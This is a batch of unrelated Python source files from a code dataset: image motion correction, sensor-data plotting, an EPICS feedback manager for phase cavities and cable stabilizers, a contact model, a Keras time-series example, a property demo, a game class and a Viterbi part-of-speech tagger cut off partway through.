\"\n val = [fname_tot_els, x_, _x, y_, _y, dt, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n database.commit()\n\n # Write meta results dictionary to the pkl file\n\n\n pkl_file = open(output_meta_pkl_file_path_full, 'wb')\n pickle.dump(meta_pkl_dict, pkl_file)\n pkl_file.close()\n\n return fname_tot_els, data[6]\n\n\ndef get_crop_from_rigid_shifts(shifts_rig):\n x_ = int(round(abs(np.array(shifts_rig)[:, 1].max()) if np.array(shifts_rig)[:, 1].max() > 0 else 0))\n _x = int(round(abs(np.array(shifts_rig)[:, 1].min()) if np.array(shifts_rig)[:, 1].min() < 0 else 0))\n y_ = int(round(abs(np.array(shifts_rig)[:, 0].max()) if np.array(shifts_rig)[:, 0].max() > 0 else 0))\n _y = int(round(abs(np.array(shifts_rig)[:, 0].min()) if np.array(shifts_rig)[:, 0].min() < 0 else 0))\n return x_, _x, y_, _y\n\n\ndef get_crop_from_pw_rigid_shifts(x_shifts_els, y_shifts_els):\n x_ = int(round(abs(x_shifts_els.max()) if x_shifts_els.max() > 0 else 0))\n _x = int(round(abs(x_shifts_els.min()) if x_shifts_els.min() < 0 else 0))\n y_ = int(round(abs(y_shifts_els.max()) if y_shifts_els.max() > 0 else 0))\n _y = int(round(abs(x_shifts_els.min()) if x_shifts_els.min() < 0 else 0))\n return x_, _x, y_, _y\n","sub_path":"src/Steps/motion_correction.py","file_name":"motion_correction.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"408184083","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\ntime = []\nfrontRightPot = []\nbackRightPot = []\nsteeringPot = []\nFx = []\nFy = []\nFz = []\nMx = []\nMy = []\nMz = []\n\ndata = [time, frontRightPot, backRightPot, steeringPot, Fx, Fy, Fz, Mx, My, Mz]\nhead = []\n\nfileName = \"output.csv\"\nMIN_TIME = 0\nMAX_TIME = 6000\nrunNum = 0\n\n\nwith open(fileName, \"r\") as f:\n\tlines = f.readlines()\n\ntime_el = (int(lines[len(lines)-1].split(\";\")[0]) - int(lines[1].split(\";\")[0]))//1000000\nmin_capture_time = int(lines[1].split(\";\")[0])\n\nprint(\"Reading data from file... \")\n\nfor j in range(0, len(lines), 1):\n\tline = lines[j].split(\";\")\n\tif line[0] != \"Time\":\n\t\tif ((min_capture_time+(MIN_TIME*1000000)) < int(line[0]) < (min_capture_time+(MAX_TIME*1000000))):\n\t\t\tfor i in range(len(data)):\n\t\t\t\tif i == 0:\n\t\t\t\t\tdata[i].append((int(line[i])-min_capture_time)/1000000)\n\t\t\t\telse:\n\t\t\t\t\tdata[i].append(int(line[i]))\n\telse:\n\t\tfor i in range(len(data)):\n\t\t\thead.append(line[i])\n\n\nprint(\"\\tFile reading finished with {0} rows of data collected.\".format(len(data[0])))\n\nSMALL_SIZE = 5\nMEDIUM_SIZE = 10\nBIGGER_SIZE = 16\ncolors = (\"red\", \"green\", \"blue\")\nnames = (\"Pots\", \"Forces\", \"Moments\")\nmaxs = [0, 0, 0]\nmins = [1023, 1023, 1023]\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE)\n\n\nplt.figure(num=None, figsize=(20, 6), dpi=100, facecolor='w', edgecolor='k')\nprint(\"Creating figures...\")\nfor x in range(3):\n for i in range(3 * x + 1, 3 * x + 4):\n idata = [int(x) for x in data[i]]\n if(min(idata) < mins[x]):\n mins[x] = min(idata)\n if(max(idata) > maxs[x]):\n maxs[x] = max(idata)\n \n\n\nfor x in range(3):\n linesL = []\n\n plt.clf()\n print(\"\\t -creating figure for Time vs {0}\".format(names[x]))\n for i in range(3 * x + 1, 3 * x + 4):\n\n area = 1\n idata = [int(x) for x in data[i]]\n plt.yticks(np.arange(mins[x], maxs[x] + 1, max(int((maxs[x] - mins[x]) / 10), 1)))\n\n plt.scatter(data[0], data[i], c=colors[i%3], s=area, alpha=0.9, label=head[i])\n plt.title(\"{0} by Time\".format(names[x]))\n plt.ylabel(\"Reading (ohms)\")\n plt.xlabel(\"Time (seconds)\")\n plt.savefig(\"{0}_{1}.png\".format(runNum, names[x]))\n","sub_path":"longDataPlot.py","file_name":"longDataPlot.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"262806272","text":"\n\nfrom xai.brain.wordbase.nouns._sheikh import _SHEIKH\n\n#class header\nclass _SHEIKHS(_SHEIKH, ):\n\tdef __init__(self,): \n\t\t_SHEIKH.__init__(self)\n\t\tself.name = \"SHEIKHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"sheikh\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sheikhs.py","file_name":"_sheikhs.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"387770604","text":"#fs_Manager.py\n\"\"\" Manager to tie pcav measurements to cable stabilizer and fiber oven. \n\nThis script, and class, implement a simplified version of the control process\nthat takes the pcav measurements, averages them, and sends drift corrections to\nthe cable stabilizer system. The fiber oven then corrects for the change in the\ncable stabilizer phase.\n\nDependencies:\n- numpy\n- matplotlib\n- scipy\n- watchdog3\n- epics (pyepics)\n\n\"\"\"\n\nimport time\nimport numpy\nfrom matplotlib import *\nfrom scipy import signal\nimport watchdog3\n#from psp.Pv import Pv # uncomment for older compatibility\nimport epics\nimport sys\nimport random\nimport argparse\nfrom collections import deque\nimport asyncio\nimport json\nimport pdb\n\nclass fs_manager():\n \"\"\"Manages pcav feedback to cable stabilizer, monitors fiber oven.\"\"\"\n def __init__(self,debug=False,sim=False):\n self.debug = debug\n self.sim = sim\n self.config = config(debug=self.debug,sim=self.sim)\n self.config.loadConfig()\n self.pcavdata = []\n for ii in range(0,4):\n self.pcavdata.append(deque([],maxlen=50)) # these vectors hold the recent pcav data for filtering\n self.pcavproc = numpy.zeros(4) # the processed output of the signal processing\n self.soscoeff = signal.iirdesign(wp=0.3,ws=0.5,gpass=0.1,gstop=40.0,output='sos') # basic elliptic low pass\n self.phoffset = {\"hxr\":0.0,\"sxr\":0.0}\n self.flywheelcomplete = False\n self.hxrfeedbackenabled = False\n self.sxrfeedbackenabled = False\n self.hxrgain = 0.0\n self.sxrgain = 0.0\n\n async def fssleep(self):\n await asyncio.sleep(1.0)\n\n async def updateCablePhaseShifters(self):\n \"\"\" Write new values to the phase shifters based on the processed data\n and what is enabled (enabled: TODO).\"\"\"\n if self.flywheelcomplete:\n await self.loadCabStabGains()\n if self.hxrfeedbackenabled:\n hxrcorrection = (numpy.mean([self.pcavproc[0],self.pcavproc[1]])- self.phoffset[\"hxr\"])*1.0e-12*360.0*476.0e6*self.hxrgain\n self.writeCablePhaseShifter(beamline=\"hxr\",value=hxrcorrection)\n if self.sxrfeedbackenabled:\n sxrcorrection = (numpy.mean([self.pcavproc[2],self.pcavproc[3]])- self.phoffset[\"sxr\"])*1.0e-12*360.0*476.0e6*self.sxrgain\n self.writeCablePhaseShifter(beamline=\"sxr\",value=sxrcorrection)\n return 0\n\n def writeCablePhaseShifter(self, beamline, value):\n \"\"\" Write a correction term to the selected cable stabilizer.\"\"\"\n if not self.debug:\n if beamline==\"hxr\":\n ref_feh_phase = self.config.pvs[\"fehFBOffset\"].get()\n self.config.pvs[\"fehphaseshifterPV\"].put(value+ref_feh_phase)\n elif beamline==\"sxr\":\n ref_neh_phase = self.config.pvs[\"nehFBOffset\"].get()\n self.config.pvs[\"nehphaseshifterPV\"].put(value+ref_neh_phase)\n else:\n if beamline==\"hxr\":\n print(\"fehphase would write: %E\" % value)\n elif beamline==\"sxr\":\n print(\"nehphase would write: %E\" % value)\n return 0\n \n async def updatePcavValues(self):\n \"\"\" Grab new phase cavity values and update the feedbacks.\n\n This is the primary feedback function for this system. 
We lowpass filter the pcav data for each beamline, and wrap a simple\n feedback around the average.\n \"\"\"\n self.pcavdata[0].append(self.config.pvs[\"pcav1PV\"].get())\n self.pcavdata[1].append(self.config.pvs[\"pcav2PV\"].get())\n self.pcavdata[2].append(self.config.pvs[\"pcav3PV\"].get())\n self.pcavdata[3].append(self.config.pvs[\"pcav4PV\"].get())\n self.pcavproc[0] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[0]))\n self.pcavproc[1] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[1]))\n self.pcavproc[2] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[2]))\n self.pcavproc[3] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[3]))\n if self.pcavdata[0].__len__() > 49 and not self.flywheelcomplete:\n self.flywheelcomplete = True\n await self.updateCablePhaseShifters()\n return 0\n \n\n async def disableFeedbackForBeamline(self, beamline):\n \"\"\" Turn off cable stabilizer feedbacks for beamline.\n \"\"\"\n if beamline == \"hxr\":\n self.hxrfeedbackenabled = False\n self.config.pvs[\"fehFBEnable\"].put(0)\n elif beamline == \"sxr\":\n self.sxrfeedbackenabled = False\n self.config.pvs[\"nehFBEnable\"].put(0)\n return 0\n\n async def enableFeedbackForBeamline(self,beamline):\n \"\"\" Turn on cable stabilizer feedbacks for beamline.\n \"\"\"\n if beamline == \"hxr\":\n self.hxrfeedbackenabled = True\n self.config.pvs[\"fehFBEnable\"].put(1)\n elif beamline == \"sxr\":\n self.sxrfeedbackenabled = True\n self.config.pvs[\"nehFBEnable\"].put(1)\n\n async def loadPreviousPcavValue(self,pcavdeque):\n \"\"\" Manage cases of a restart of various components of the system.\n\n Not yet implemented.\n \"\"\"\n pass\n\n async def zeroPcavOffsets(self):\n \"\"\" Write current offsets to center both cable stabilizers at current position\"\"\"\n await self.zeroPcavOffsetForBeamline('hxr')\n await self.zeroPcavOffsetForBeamline('sxr')\n return 0\n\n async def zeroPcavOffsetForBeamline(self,beamline):\n \"\"\" Write current offsets to center the cable stabilizer for a\n beamline.\"\"\"\n if self.debug:\n print(\"zeroing pcav offsets for %s\" % beamline.upper())\n if beamline==\"hxr\":\n self.phoffset[\"hxr\"]= self.phoffset[\"hxr\"] + numpy.mean([self.config.pvs[\"pcav1PV\"].get(),self.config.pvs[\"pcav2PV\"].get()])\n self.config.pvs[\"fehFBOffset\"].put(value=self.phoffset[\"hxr\"]) \n elif beamline==\"sxr\":\n self.phoffset[\"sxr\"]= self.phoffset[\"sxr\"] + numpy.mean([self.config.pvs[\"pcav3PV\"].get(),self.config.pvs[\"pcav4PV\"].get()])\n self.config.pvs[\"nehFBOffset\"].put(value=self.phoffset[\"sxr\"]) \n return 0\n # update dc offset to phase shifter delta correction term\n # save these offsets to local values\n\n async def loadPcavOffsets(self):\n \"\"\" Load pcav offsets from previous values, if needed.\"\"\"\n pass\n\n async def loadCabStabGains(self):\n \"\"\" Update the feedback gains from the PVs. \"\"\"\n self.hxrgain = self.config.pvs[\"fehFBGain\"].get()\n self.sxrgain = self.config.pvs[\"nehFBGain\"].get()\n self.hxrfeedbackenabled = self.config.pvs[\"fehFBEnable\"].get()\n self.sxrfeedbackenabled = self.config.pvs[\"nehFBEnable\"].get()\n\n async def updateStartingCabStabPhases(self):\n \"\"\" Copy the current phase shifter position to offsets. \"\"\"\n self.config.pvs[\"fehFBOffset\"].put(self.config.pvs[\"fehphaseshifterPV\"].get())\n self.config.pvs[\"nehFBOffset\"].put(self.config.pvs[\"nehphaseshifterPV\"].get())\n return 0\n\n async def updateState(self):\n \"\"\" Function to monitor and respond to differences in state. 
\"\"\"\n # if self.config.pvs[\"fehFBEnable\"].get().value() != 0:\n # self.hxrfeedbackenabled = True\n # else\n # self.hxrfeedbackenabled = False\n # if self.config.pvs[\"nehFBEnable\"].get().value() != 0:\n # self.sxrfeedbackenabled = True\n # else\n # self.sxrfeedbackenabled = False\n if self.config.pvs[\"fehFBRequestZero\"].get() != 0:\n await self.zeroPcavOffsetForBeamline(\"hxr\")\n self.config.pvs[\"fehFBRequestZero\"].put(value=0)\n if self.config.pvs[\"nehFBRequestZero\"].get() != 0:\n await self.zeroPcavOffsetForBeamline(\"sxr\")\n self.config.pvs[\"nehFBRequestZero\"].put(value=0)\n self.phoffset[\"hxr\"] = self.config.pvs[\"fehFBOffset\"].get()\n self.phoffset[\"sxr\"] = self.config.pvs[\"nehFBOffset\"].get()\n self.hxrgain = self.config.pvs[\"fehFBGain\"].get()\n self.sxrgain = self.config.pvs[\"nehFBGain\"].get()\n self.hxrfeedbackenabled = self.config.pvs[\"fehFBEnable\"].get()\n self.sxrfeedbackenabled = self.config.pvs[\"nehFBEnable\"].get()\n\n\nclass config(object):\n def __init__(self,debug=False,sim=False):\n self.pvstrlist = [\"pcav1PV\",\"pcav2PV\",\"pcav3PV\",\"pcav4PV\",\"fehphaseshifterPV\",\"nehphaseshifterPV\",\"fiberoventempPV\",\"watchdog\",\"fehFBEnable\",\"nehFBEnable\",\"fehFBOffset\",\"nehFBOffset\",\"fehFBGain\",\"nehFBGain\",\"restorePrevious\",\"fehFBRequestZero\",\"nehFBRequestZero\"]\n self.configIsValid = False\n self.pvs = {}\n self.debug = debug\n self.sim = sim\n \n def loadConfig(self):\n if self.sim:\n with open(\"proto_fsmanager_config.json\",'r') as fp:\n self.inputjson = json.load(fp)\n else:\n with open(\"fsmanager_config.json\",'r') as fp:\n self.inputjson = json.load(fp)\n for pvstr in self.pvstrlist:\n if pvstr not in self.inputjson[\"pvs\"].keys():\n print(\"configuration file poorly formatted: %s\" % pvstr)\n return\n else:\n self.pvs[pvstr] = epics.PV(self.inputjson[\"pvs\"][pvstr])\n temp = self.pvs[pvstr].get()\n if temp is None:\n print(\"could not access pv: %s\" % pvstr)\n return\n self.configIsValid = True\n if self.debug:\n print('loadConfig: completed')\n\nasync def main():\n fsmgr = fs_manager(debug=args.debug,sim=args.simulation)\n watchdogCounter = watchdog3.watchdog(fsmgr.config.pvs[\"watchdog\"])\n if watchdogCounter.error:\n return 1\n await fsmgr.zeroPcavOffsets()\n await fsmgr.updateStartingCabStabPhases()\n while watchdogCounter.error == 0:\n await fsmgr.updateState()\n await fsmgr.updatePcavValues()\n watchdogCounter.check()\n await fsmgr.fssleep()\n # pdb.set_trace()\n # print(fsmgr.pcavdata[0][0],fsmgr.pcavdata[2][0])\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description = 'Manager to tie pcav measurements to cable stabilizer and fiber oven.')\n parser.add_argument(\"-D\", \"--debug\", action=\"store_true\",help=\"Print output state, but do not execute\")\n parser.add_argument(\"-S\", \"--simulation\", action=\"store_true\",help=\"Run the manager code with simulated PVs\")\n args = parser.parse_args()\n # asyncio.run(main()) # changing to python3.6\n asyncio.get_event_loop().run_until_complete(main())","sub_path":"fsManager.py","file_name":"fsManager.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
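The filtering inside updatePcavValues above can be exercised in isolation; a minimal sketch with fabricated pcav samples, reusing the same iirdesign parameters as fs_manager.__init__ (the picosecond unit is an assumption suggested by the 1.0e-12 factor in the correction formula):

from collections import deque
import numpy
from scipy import signal

# Same basic elliptic low-pass as the class constructor above.
sos = signal.iirdesign(wp=0.3, ws=0.5, gpass=0.1, gstop=40.0, output='sos')

# Fabricated rolling window of 50 readings, as held in self.pcavdata.
window = deque(numpy.random.normal(0.0, 0.05, size=50), maxlen=50)

# Filter the window, then average it, as the once-per-second loop does.
drift_estimate = numpy.mean(signal.sosfilt(sos, numpy.asarray(window)))
print("drift estimate: %+.4f ps" % drift_estimate)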
+{"seq_id":"600087870","text":"\nfrom sys import maxsize\n\nclass Contact:\n\n def __init__(self, first_name=None, last_name=None, id=None, address=None,\n home_phone=None, mobile_phone=None, work_phone=None, secondary_phone=None,\n email=None, email2=None, email3=None, all_phones_from_homepage=None, all_mails_from_homepage=None):\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n self.home_phone = home_phone\n self.mobile_phone = mobile_phone\n self.work_phone = work_phone\n self.secondary_phone = secondary_phone\n self.email = email\n self.email2 = email2\n self.email3 = email3\n self.id = id\n self.all_phones_from_homepage = all_phones_from_homepage\n self.all_mails_from_homepage = all_mails_from_homepage\n\n\n def __repr__(self):\n return \"%s:%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\" % (self.id, self.last_name, self.first_name,\n self.address, self.home_phone, self.mobile_phone, self.work_phone,\n self.secondary_phone, self.email, self.email2, self.email3)\n\n def __eq__(self, other):\n return (self.id is None or other.id is None or self.id == other.id) \\\n and self.last_name == other.last_name \\\n and self.first_name == other.first_name\n\n def id_or_max(self):\n if self.id:\n return int(self.id)\n else:\n return maxsize","sub_path":"model/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
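The parentheses in __eq__ matter because `and` binds tighter than `or`; without them, a missing id makes the whole expression True and the name checks are never reached. A two-line illustration:

print(None is None or False or 1 == 2 and False)    # True: the or-chain short-circuits
print((None is None or False or 1 == 2) and False)  # False: the id check is grouped first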
+{"seq_id":"14991934","text":"# Write three output models with output dim 1\n# Build them from t08\n\n\nfrom numpy import array\nfrom numpy import hstack\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense,Input\nfrom keras.layers.merge import concatenate\n\ndef split_sequence(sequence, n_steps):\n X, y = list(), list()\n for i in range(len(sequence)):\n # find the end of this pattern\n end_ix = i + n_steps\n # check if we are beyond the sequence\n if end_ix > len(sequence)-1:\n break\n # gather input and output parts of the pattern\n seq_x, seq_y = sequence[i:end_ix, :], sequence[i+1:end_ix+1, :]\n X.append(seq_x)\n y.append(seq_y)\n return array(X), array(y)\n\n# define input sequence\nin_seq1 = array([10, 20, 30, 40, 50, 60, 70, 80, 90])\nin_seq2 = array([15, 25, 35, 45, 55, 65, 75, 85, 95])\nout_seq = array([in_seq1[i]+in_seq2[i] for i in range(len(in_seq1))])\n\n# convert to [rows, columns]\nin_seq1 = in_seq1.reshape((len(in_seq1), 1))\nin_seq2 = in_seq2.reshape((len(in_seq2), 1))\nout_seq = out_seq.reshape((len(out_seq), 1))\n\n# horizontally stack columns\ndataset = hstack((in_seq1, in_seq2, out_seq))\nprint(dataset)\nn_steps = 3\nX, y = split_sequence(dataset, n_steps=n_steps)\nprint(X.shape, y.shape)\n\nfor i in range(len(X)):\n print(X[i], y[i])\n\n# flatten\nn_input = X.shape[1] * X.shape[2]\nX = X.reshape((X.shape[0], n_input))\nn_output = y.shape[1] * y.shape[2]\ny = y.reshape((y.shape[0], n_output))\n\n# model\nmodel = Sequential()\nmodel.add(Dense(100, activation='relu', input_dim=n_input))\nmodel.add(Dense(n_output))\nmodel.compile(optimizer='adam', loss='mse')\n\nmodel.fit(X, y, epochs=2000, verbose=0)\n\nx_input = array([[70, 75, 145], [80, 85, 165], [90, 95, 185]])\nx_input = x_input.reshape((1, n_input))\nyhat = model.predict(x_input, verbose=0)\nyhat = yhat.reshape((3,3))\nprint(yhat)\n\"\"\"\n#\nX1 = X[:, :, 0]\nX2 = X[:, :, 1]\nX3 = X[:, :, 2]\n\n# first input model\nvisible1 = Input(shape=(n_steps,))\ndense1 = Dense(100, activation='relu')(visible1)\n# second input model\nvisible2 = Input(shape=(n_steps,))\ndense2 = Dense(1000, activation='relu')(visible2)\n# third input model\nvisible3 = Input(shape=(n_steps,))\ndense3 = Dense(1000, activation='relu')(visible3)\n\n# merge input models\nmerge = concatenate([dense1, dense2, dense3])\noutput = Dense(3)(merge)\nmodel = Model(inputs=[visible1, visible2, visible3], outputs=output)\nmodel.compile(optimizer='adam', loss='mse')\n# fit model\nmodel.fit([X1, X2, X3], y, epochs=2000, verbose=0)\n\n# demonstrate prediction\nx_input = array([[70, 75, 145], [80, 85, 165], [90, 95, 185]])\nx1 = x_input[:, 0].reshape((1, n_steps))\nx2 = x_input[:, 1].reshape((1, n_steps))\nx3 = x_input[:, 2].reshape((1, n_steps))\nyhat = model.predict([x1, x2, x3], verbose=0)\n\nprint(yhat)\n\"\"\"","sub_path":"time/t10_test.py","file_name":"t10_test.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
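A quick shape check for the split_sequence defined above, on a fabricated two-column series, to make the one-step-ahead windowing explicit before the flatten step:

import numpy as np

toy = np.array([[i, 10 * i] for i in range(1, 6)])  # fabricated, shape (5, 2)
X, y = split_sequence(toy, n_steps=3)
# Each X window covers rows t..t+2; each y window is the same span shifted by one row.
print(X.shape, y.shape)  # -> (2, 3, 2) (2, 3, 2)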
+{"seq_id":"154186671","text":"class Employee:\n def __init__(self, name, company, retired='NO'):\n self.__name = name\n self.__company = company\n self.__retired = retired\n\n @property\n def company(self):\n print(\"@property class method called: \")\n return self.__company\n\n @company.setter\n def company(self, value):\n print(\"@company.setter class method called: \")\n self.__company = value\n\n\ne = Employee(\"Prafull\", \"Amazon\")\nprint(\"Company name is : \", e.company)\nprint(\"=\" * 35)\ne.company = \"Google\"\nprint(\"Company name is : \", e.company)\nprint(\"=\" * 35)\nEmployee.company = \"Microsoft\"\nprint(\"Company name is : \", Employee.company)\n\n\n\n\n\n","sub_path":"property_deco.py","file_name":"property_deco.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
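One subtlety in the demo above: e.company = ... routes through the @company.setter, while Employee.company = "Microsoft" replaces the property descriptor on the class with a plain string, so the getter and setter are gone afterwards. Continuing from the code above:

print(type(Employee.company))  # <class 'str'>: the property object was overwritten
e.company = "Netflix"          # plain attribute assignment now; the setter is not called
print(e.company)               # Netflix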
+{"seq_id":"390569484","text":"import adv.adv_test\nfrom core.advbase import *\n\ndef module():\n return Fritz\n\nclass Fritz(Adv):\n conf = {}\n conf['acl'] = \"\"\"\n `s1, seq=5 and cancel or fsc\n `s2\n `s3, seq=5 and cancel or fsc\n `fs, seq=5\n \"\"\"\n\n def prerun(this):\n this.stance = 0\n this.s2fscharge = 0\n\n def s2_proc(this, e):\n this.s2fscharge = 3\n\n def fs_proc(this, e):\n if this.s2fscharge > 0:\n this.s2fscharge -= 1\n this.dmg_make(\"o_fs_boost\",0.57*3+0.29)\n\n\n\nif __name__ == '__main__':\n conf = {}\n adv.adv_test.test(module(), conf, verbose=0)\n","sub_path":"adv/fritz.py","file_name":"fritz.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"118172756","text":"# -*- coding: utf-8 -*-\n# Importing necessary libraries\n\nimport numpy as np\nimport itertools\nimport matplotlib\nimport nltk\nimport random\nimport math\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport matplotlib.pyplot as plt\nimport statistics\nimport pandas as pd\n\n# display_conf_matrix() takes the confusion matrix and produces a visual of it\ndef display_conf_matrix(conf, labels):\n # Set font values for the confusion matrix image\n font = {'family' : 'DejaVu Sans',\n 'weight' : 'bold',\n 'size' : 10}\n plt.rc('font', **font)\n cm_obj=ConfusionMatrixDisplay(conf, display_labels=labels)\n fig, ax = plt.subplots(figsize=(30,30))\n ax.set_xticklabels(labels,fontsize=9)\n ax.set_yticklabels(labels,fontsize=9)\n # values_format='' is used to avoid showing in precision format eg 4200 shouldn't be shown as 4.2e3 (just to make the confusion matrix look better) \n cm_obj.plot(ax=ax,values_format='')\n # set the axis labels and title\n cm_obj.ax_.set(\n title=\"Confusion Matrix\",\n xlabel=\"Predicted\",\n ylabel=\"Actual\"\n )\n ax.xaxis.label.set_size(30)\n ax.yaxis.label.set_size(30)\n ax.title.set_size(30)\n\n\n# per_POS_evaluation() calculates the per POS performance\n# For each pair of tags (one from row and the other from column) in the confusion matrix\n# calculate the precision, recall and F1 Score\n# All these scores are stored in a dataframe and the dataframe is returned\ndef per_POS_evaluation(conf_matrix,uniq_tag):\n li=[]\n for i in range(len(conf_matrix)):\n rt,ct=0,0\n # rt= no. of actual tags for tag i\n # ct= no. of predicted(obtained) tags for tag i\n for j in range(len(conf_matrix)):\n rt+=conf_matrix[i][j]\n ct+=conf_matrix[j][i]\n A=conf_matrix[i][i]\n # Calculate scores for each POS tag \n prec=A/ct\n rec=A/rt\n F1=(2*prec*rec)/(prec+rec)\n li.append([prec,rec,F1])\n di={}\n i=0\n for l in li:\n di[uniq_tag[i]]=l\n i+=1\n table=pd.DataFrame.from_dict(di, orient='index')\n table.columns=['Precision', 'Recall', 'F1_Score']\n return table\n\n# Getting the brown corpus\nprint(\"Downloading files from NLTK please wait...\")\nnltk.download('all', quiet=True)\nprint(\"NLTK files downloaded!\") \nfrom nltk.corpus import brown\n\n# Sentences are fetched with their words tagged with the universal tagset, and sentences are\n# prefixed and suffixed by delimiters. 
If originally sentence contains a \n# delimiter then set it as ('','X')\nsentence_tag = nltk.corpus.brown.tagged_sents(tagset=\"universal\")\nmodified_sentence_tag=[]\nfor sent in sentence_tag:\n for word,tag in sent:\n if word=='^^' or word=='$$':\n word=''\n tag='X'\n sent.insert(0,('^^','^^')) # Sentence starts with '^^'\n sent.append(('$$','$$')) # Sentence ends with '$$'\n modified_sentence_tag.append(sent)\n\n# Shuffle the whole corpus uniformly\nrandom.shuffle(modified_sentence_tag)\n\n# Divide corpus into 5 equal parts\nsentences_set1=modified_sentence_tag[:math.floor(len(modified_sentence_tag)*1/5)]\nsentences_set2=modified_sentence_tag[math.floor(len(modified_sentence_tag)*1/5):math.floor(len(modified_sentence_tag)*2/5)]\nsentences_set3=modified_sentence_tag[math.floor(len(modified_sentence_tag)*2/5):math.floor(len(modified_sentence_tag)*3/5)]\nsentences_set4=modified_sentence_tag[math.floor(len(modified_sentence_tag)*3/5):math.floor(len(modified_sentence_tag)*4/5)]\nsentences_set5=modified_sentence_tag[math.floor(len(modified_sentence_tag)*4/5):]\n\ntrain_sentences=[[],[],[],[],[]]\ntest_sentences=[[],[],[],[],[]]\n\n# For 5 Fold Cross Validation Train and test set\n# Set1 as test set\ntrain_sentences[0]=sentences_set2+sentences_set3+sentences_set4+sentences_set5\ntest_sentences[0]=sentences_set1\n\n# Set2 as test set\ntrain_sentences[1]=sentences_set1+sentences_set3+sentences_set4+sentences_set5\ntest_sentences[1]=sentences_set2\n\n# Set3 as test set\ntrain_sentences[2]=sentences_set1+sentences_set2+sentences_set4+sentences_set5\ntest_sentences[2]=sentences_set3\n\n# Set4 as test set\ntrain_sentences[3]=sentences_set1+sentences_set2+sentences_set3+sentences_set5\ntest_sentences[3]=sentences_set4\n\n# Set5 as test set\ntrain_sentences[4]=sentences_set1+sentences_set2+sentences_set3+sentences_set4\ntest_sentences[4]=sentences_set5\n\nprecision_sets=[0]*5\nrecall_sets=[0]*5\nF1_score_sets=[0]*5\nF05_score_sets=[0]*5\nF2_score_sets=[0]*5\npos_estimation_sets=[pd.DataFrame]*5\nprint(\"Running Viterbi over all 5 cross validation sets...\") #Note this is just for showing progress, viterbi is executed further in the loop\nfor setno in range(5):\n # For each set calculate the transmission and emission probabilities on training set\n # And perform viterbi on test set. 
Later find per POS and overall estimation\n train_dataset = train_sentences[setno]\n test_dataset = test_sentences[setno]\n\n ## EMISSION PROBABILITY TABLE\n # Creation of a dictionary whose keys are tags and values contain words which have corresponding tag in the taining dataset\n # example:- 'TAG':{word1: count(word1,'TAG')} count(word1,'TAG') means how many times the word is tagged as 'TAG'\n train_word_tag = {}\n for sent in train_dataset:\n for (word,tag) in sent:\n word=word.lower() # removing ambiguity from capital letters \n try:\n try:\n train_word_tag[tag][word]+=1\n except:\n train_word_tag[tag][word]=1\n except:\n train_word_tag[tag]={word:1}\n\n #Calculation of emission probabilities using train_word_tag\n train_emission_prob={}\n for key in train_word_tag.keys():\n train_emission_prob[key]={}\n count = sum(train_word_tag[key].values()) # count is total number of words tagged as a 'TAG'\n for key2 in train_word_tag[key].keys():\n train_emission_prob[key][key2]=train_word_tag[key][key2]/count \n #Emission probability is #times a word occured as 'TAG' / total number of 'TAG' words\n #example: number of times 'Sandeep' occured as Noun / total number of nouns\n\n ## TRANSITION PROBABILITY TABLE\n #Estimating the bigrams of tags to be used for calculation of transition probability \n #Bigram Assumption is made, the current tag depends only on the previous tag\n bigram_tag_data = {}\n for sent in train_dataset:\n bi=list(nltk.bigrams(sent))\n for b1,b2 in bi:\n try:\n try:\n bigram_tag_data[b1[1]][b2[1]]+=1\n except:\n bigram_tag_data[b1[1]][b2[1]]=1\n except:\n bigram_tag_data[b1[1]]={b2[1]:1}\n\n #bigram_tag_data is storing the values for every tag.\n #Every key is a tag and value is tag followed for that key and corresponding counts.\n #example: how many times an adj is followed by a noun {Noun:{Adj:3}}, here its 3 times.\n\n #Calculation of the probabilities of tag bigrams for transition probability\n #We already made a bigram assumption \n #Also note that since we are also considering $, the $ row of transition probability matrix give us the initial probabilities as well\n bigram_tag_prob={}\n for key in bigram_tag_data.keys():\n bigram_tag_prob[key]={}\n count=sum(bigram_tag_data[key].values()) # count is total number of times a 'TAG' has occured\n for key2 in bigram_tag_data[key].keys():\n bigram_tag_prob[key][key2]=bigram_tag_data[key][key2]/count\n #Tranmission probability is #times a TAG2 is preceded by TAG1 / total number of times 